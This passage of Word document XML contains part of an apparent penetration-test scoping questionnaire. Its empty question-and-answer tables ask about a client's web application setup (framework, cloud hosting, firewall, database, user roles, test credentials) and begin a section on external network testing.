        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="011AE41C" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRDefault="00112BBC" w:rsidP="00EA00E3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00112BBC" w14:paraId="64E4CFBD" w14:textId="77777777" w:rsidTr="00EA00E3">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="48EE2D80" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRDefault="00112BBC" w:rsidP="00EA00E3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t>What framework is used, if any?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="74546648" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRDefault="00112BBC" w:rsidP="00EA00E3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00112BBC" w14:paraId="40394E14" w14:textId="77777777" w:rsidTr="00EA00E3">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="390281F8" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRDefault="00112BBC" w:rsidP="00EA00E3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t>Is it a Cloud hosted site?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="3040C7AF" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRDefault="00112BBC" w:rsidP="00EA00E3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00112BBC" w14:paraId="6370978A" w14:textId="77777777" w:rsidTr="00EA00E3">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="7175365F" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRDefault="00112BBC" w:rsidP="00EA00E3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t>Cloud provider name?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="38B3C3F0" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRDefault="00112BBC" w:rsidP="00EA00E3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00112BBC" w14:paraId="46D60F34" w14:textId="77777777" w:rsidTr="00EA00E3">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="717282AA" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRDefault="00112BBC" w:rsidP="00EA00E3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t>Have you submitted a testing request with the provider?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="510BA56C" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRDefault="00112BBC" w:rsidP="00EA00E3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00112BBC" w14:paraId="07734F28" w14:textId="77777777" w:rsidTr="00EA00E3">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="1D12181B" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRDefault="00112BBC" w:rsidP="00EA00E3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t>Is a web application firewall (WAF) being utilized?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="5A3391F5" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRDefault="00112BBC" w:rsidP="00EA00E3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00112BBC" w14:paraId="16A28FA9" w14:textId="77777777" w:rsidTr="00EA00E3">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="6DB05B44" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRDefault="00112BBC" w:rsidP="00EA00E3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t>If “YES”, will the WAF be disabled during testing, or is it possible to whitelist our IPS’s?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="21AA2037" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRDefault="00112BBC" w:rsidP="00EA00E3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00112BBC" w14:paraId="5944F618" w14:textId="77777777" w:rsidTr="00EA00E3">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="756E0A47" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRDefault="00112BBC" w:rsidP="00EA00E3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t>What is the backend database, if applicable (MySQL, Microsoft SQL, AWS Database, Oracle etc.)?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="198D355D" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRDefault="00112BBC" w:rsidP="00EA00E3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00112BBC" w14:paraId="3F05992B" w14:textId="77777777" w:rsidTr="00EA00E3">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="45A1D13B" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRDefault="00112BBC" w:rsidP="00EA00E3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t>Does the application have multiple roles (unauthenticated, user, admin, manager)?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="6BE4AE74" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRDefault="00112BBC" w:rsidP="00EA00E3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00112BBC" w14:paraId="21AA3B55" w14:textId="77777777" w:rsidTr="00EA00E3">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="54D1D85E" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRDefault="00112BBC" w:rsidP="00EA00E3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>Does role-based testing is required?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="11666E82" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRDefault="00112BBC" w:rsidP="00EA00E3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00112BBC" w14:paraId="7F8F3059" w14:textId="77777777" w:rsidTr="00EA00E3">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="1AB2F802" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRDefault="00112BBC" w:rsidP="00EA00E3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t>What is the application login credentials, if required? (Please provide login and password of all roles which should be tested, administrator, editor, user, customer etc.)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="5EE12D2E" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRDefault="00112BBC" w:rsidP="00EA00E3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00112BBC" w14:paraId="67446C57" w14:textId="77777777" w:rsidTr="00EA00E3">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="333EC317" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRDefault="00112BBC" w:rsidP="00EA00E3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t>Is the site hosted on a shared platform with other sites?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="09CF0D78" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRDefault="00112BBC" w:rsidP="00EA00E3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00112BBC" w14:paraId="26A52F83" w14:textId="77777777" w:rsidTr="00EA00E3">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="46FD24D7" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRDefault="00112BBC" w:rsidP="00EA00E3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t>Is the site load balanced?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="787B20C5" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRDefault="00112BBC" w:rsidP="00EA00E3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00112BBC" w14:paraId="154F04B3" w14:textId="77777777" w:rsidTr="00EA00E3">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="2A1C7781" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRDefault="00112BBC" w:rsidP="00EA00E3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t>Are Administrators or Developers notified of errors via email?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="21214B35" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRDefault="00112BBC" w:rsidP="00EA00E3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00112BBC" w14:paraId="04EC9F79" w14:textId="77777777" w:rsidTr="00EA00E3">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="137415B5" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRDefault="00112BBC" w:rsidP="00EA00E3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t>Will the documentation of application be provided?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="67716996" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRDefault="00112BBC" w:rsidP="00EA00E3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00112BBC" w14:paraId="39607978" w14:textId="77777777" w:rsidTr="00EA00E3">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="04AEA1BA" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRDefault="00112BBC" w:rsidP="00EA00E3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t>Is a backend in scope?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="3A7F1BF6" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRDefault="00112BBC" w:rsidP="00EA00E3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00112BBC" w14:paraId="46EB002A" w14:textId="77777777" w:rsidTr="00EA00E3">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="4520C6E9" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRDefault="00112BBC" w:rsidP="00EA00E3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t>Is test data provided?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="157BBC14" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRDefault="00112BBC" w:rsidP="00EA00E3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00112BBC" w14:paraId="175CB5E7" w14:textId="77777777" w:rsidTr="00EA00E3">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="40722E3D" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRDefault="00112BBC" w:rsidP="00EA00E3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="7764B1F9" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRDefault="00112BBC" w:rsidP="00EA00E3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6D0C9929" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRDefault="00112BBC" w:rsidP="00EA00E3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5ABB2A12" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRPr="003D4623" w:rsidRDefault="00112BBC" w:rsidP="00112BBC">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="58" w:name="nva---external"/>
      <w:bookmarkEnd w:id="57"/>
      <w:r w:rsidRPr="003D4623">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>NVA - External</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:w="5000" w:type="pct"/>
        <w:tblBorders>
          <w:insideH w:val="single" w:sz="4" w:space="0" w:color="auto"/>
          <w:insideV w:val="single" w:sz="4" w:space="0" w:color="auto"/>
        </w:tblBorders>
        <w:tblLook w:val="0020" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8355"/>
        <w:gridCol w:w="1005"/>
      </w:tblGrid>
      <w:tr w:rsidR="00112BBC" w14:paraId="39A57FA6" w14:textId="77777777" w:rsidTr="00EA00E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5949D57F" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRDefault="00112BBC" w:rsidP="00EA00E3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t>Question</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="009044A1" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRDefault="00112BBC" w:rsidP="00EA00E3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t>Answer</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00112BBC" w14:paraId="00D7E122" w14:textId="77777777" w:rsidTr="00EA00E3">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1D1ECEC3" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRDefault="00112BBC" w:rsidP="00EA00E3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t>Information required for the Network (external) penetration test</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="41EECA68" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRDefault="00112BBC" w:rsidP="00EA00E3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00112BBC" w14:paraId="5AEA7137" w14:textId="77777777" w:rsidTr="00EA00E3">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="74E497A9" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRDefault="00112BBC" w:rsidP="00EA00E3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t>If systems are hosted outside the client managed network, please specify which hosting/cloud provider hosts these systems.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="009B2516" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRDefault="00112BBC" w:rsidP="00EA00E3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00112BBC" w14:paraId="3A3A1C2F" w14:textId="77777777" w:rsidTr="00EA00E3">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6F063BF9" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRDefault="00112BBC" w:rsidP="00EA00E3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t>Have you received authorization for testing from provider?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5D37A176" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRDefault="00112BBC" w:rsidP="00EA00E3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00112BBC" w14:paraId="5B61BCF7" w14:textId="77777777" w:rsidTr="00EA00E3">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="62581BA0" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRDefault="00112BBC" w:rsidP="00EA00E3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t>How many external IP addresses are in scope for testing?</w:t>
            </w:r>
